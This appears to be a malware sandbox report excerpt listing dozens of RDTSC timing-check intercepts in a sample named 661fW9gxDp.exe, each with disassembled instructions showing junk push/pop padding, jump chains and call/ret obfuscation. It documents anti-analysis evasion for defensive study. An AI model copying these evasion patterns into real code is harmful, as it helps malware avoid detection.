              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 100FB22 second address: 100FB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 101000B second address: 1010016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F646CD14776h 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10108B4 second address: 10108C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F646C53F7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10108C3 second address: 10108EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F646CD14776h 0x0000000a jmp 00007F646CD14788h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10113AE second address: 10113B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1018F59 second address: 1018F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14786h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10194EA second address: 10194F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10194F0 second address: 1019551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14783h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F646CD14776h 0x00000011 jmp 00007F646CD14788h 0x00000016 jp 00007F646CD14776h 0x0000001c jo 00007F646CD14776h 0x00000022 popad 0x00000023 ja 00007F646CD14792h 0x00000029 jbe 00007F646CD1477Eh 0x0000002f pushad 0x00000030 jns 00007F646CD14776h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 101F91C second address: 101F92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F646C53F7A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 101F92D second address: 101F946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F646CD14776h 0x0000000d jmp 00007F646CD1477Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 101F946 second address: 101F94A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 101F94A second address: 101F955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 101F955 second address: 101F95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102016A second address: 1020196 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F646CD14776h 0x00000008 jmp 00007F646CD14781h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F646CD14781h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1020196 second address: 10201A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10201A7 second address: 10201B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102B16F second address: 102B178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102B178 second address: 102B17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102B17E second address: 102B18A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102B18A second address: 102B198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F646CD14776h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102CBAD second address: 102CBB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102EFB7 second address: 102EFC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 102EFC0 second address: 102EFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1039A2D second address: 1039A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1039A31 second address: 1039A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 103CCB8 second address: 103CCCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F646CD1477Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 103E760 second address: 103E771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 103E771 second address: 103E77D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 103E77D second address: 103E781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 103E781 second address: 103E785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 103E8DC second address: 103E8E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10471A8 second address: 10471AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10471AC second address: 10471B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F646C53F7A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10471B8 second address: 10471E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14786h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F646CD14794h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F646CD14776h 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10471E2 second address: 10471E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 104F06E second address: 104F080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD1477Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 104F080 second address: 104F098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F646C53F7B3h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1050F17 second address: 1050F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14781h 0x00000009 pop eax 0x0000000a jbe 00007F646CD1477Eh 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007F646CD14776h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F646CD1477Ah 0x0000001f jng 00007F646CD14787h 0x00000025 jmp 00007F646CD14781h 0x0000002a push eax 0x0000002b push edx 0x0000002c ja 00007F646CD14776h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1050F66 second address: 1050F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1050DDE second address: 1050DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1050DE8 second address: 1050DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1050DEC second address: 1050DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10584BF second address: 1058522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7B1h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b jmp 00007F646C53F7B0h 0x00000010 ja 00007F646C53F7A6h 0x00000016 pop ecx 0x00000017 jmp 00007F646C53F7B4h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F646C53F7B8h 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop edi 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1056E96 second address: 1056EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14789h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105713B second address: 105713F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105713F second address: 1057147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1057147 second address: 105715F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B3h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105715F second address: 105718C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F646CD14776h 0x0000000a jp 00007F646CD14776h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jne 00007F646CD14794h 0x00000019 je 00007F646CD1477Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 jng 00007F646CD14776h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105743A second address: 105743F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105743F second address: 1057451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F646CD14776h 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105759C second address: 10575A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1057812 second address: 105781A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105781A second address: 1057826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F646C53F7A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1057826 second address: 105783E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F646CD1477Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105C044 second address: 105C051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F646C53F7A6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105C051 second address: 105C062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jc 00007F646CD147BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105E2FC second address: 105E300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105E300 second address: 105E339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD1477Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F646CD14783h 0x00000013 jmp 00007F646CD1477Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 105E339 second address: 105E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 106BD32 second address: 106BD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1079698 second address: 107969C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 107969C second address: 10796A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DEF9 second address: 108DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DF03 second address: 108DF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DF07 second address: 108DF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108CD3D second address: 108CD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F646CD14776h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F646CD14780h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push edi 0x0000001c pop edi 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108CD65 second address: 108CD6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108CD6B second address: 108CD82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646CD14783h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108D00E second address: 108D012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108D8E1 second address: 108D8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108D8E5 second address: 108D8F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F646C53F7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DA7F second address: 108DAB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 jne 00007F646CD14776h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 je 00007F646CD1477Eh 0x00000017 push eax 0x00000018 jne 00007F646CD14776h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DAB0 second address: 108DAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DAC1 second address: 108DACB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F646CD14776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F6BA12 second address: F6BA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108DC37 second address: 108DC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F646CD14776h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108F593 second address: 108F5AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F646C53F7ACh 0x00000010 jnl 00007F646C53F7A6h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108F5AC second address: 108F5FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14784h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F646CD1477Ch 0x00000014 jmp 00007F646CD14783h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F646CD1477Ah 0x00000020 jmp 00007F646CD1477Ah 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 108F5FE second address: 108F608 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 1092315 second address: 109231A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 109231A second address: 10923AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F646C53F7B0h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F646C53F7A8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F646C53F7A8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 mov edx, 164B19C8h 0x00000049 call 00007F646C53F7B9h 0x0000004e push ecx 0x0000004f or dword ptr [ebp+12475CEEh], edx 0x00000055 pop edx 0x00000056 pop edx 0x00000057 call 00007F646C53F7A9h 0x0000005c je 00007F646C53F7B4h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10923AF second address: 10923B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10923B5 second address: 10923E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F646C53F7B9h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jng 00007F646C53F7B0h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10923E2 second address: 10923F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 10926D8 second address: 10926F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F646C53F7ABh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: 4F70659 second address: 4F7066B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
